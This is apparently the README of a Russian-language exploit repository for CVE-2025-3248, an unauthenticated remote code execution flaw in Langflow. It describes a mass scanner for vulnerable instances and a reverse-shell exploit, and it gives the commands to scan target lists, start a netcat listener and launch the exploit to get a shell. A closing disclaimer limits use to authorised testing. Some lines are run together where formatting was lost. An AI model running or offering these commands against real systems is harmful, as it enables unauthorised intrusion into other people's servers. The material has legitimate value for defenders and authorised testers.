
Этот репозиторий содержит два Python-скрипта:
LangflowCheck.py: Сканер, который проверяет экземпляры Langflow AI на уязвимость к CVE-2025-3248.exploit.py: Рабочий эксплойт reverse shell для уязвимых целей Langflow.CVE-2025-3248 — критическая уязвимость в Langflow AI, которая позволяет неаутентифицированным атакующим удалённо выполнять произвольный Python-код с помощью специально сформированной полезной нагрузки, отправляемой на /api/v1/validate/code.
LangflowCheck.py/etc/passwd.exploit.pylhost) и порт прослушивания (lport).exploit.log.pip install -r requirements.txt
Одиночный URL
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

Несколько целей
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

Сначала запустите слушатель
sudo nc -nvlp 4444

Затем запустите эксплойт:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

Если цель уязвима, вы должны получить shell.

Этот эксплойт предназначен только для образовательного и авторизованного тестирования безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.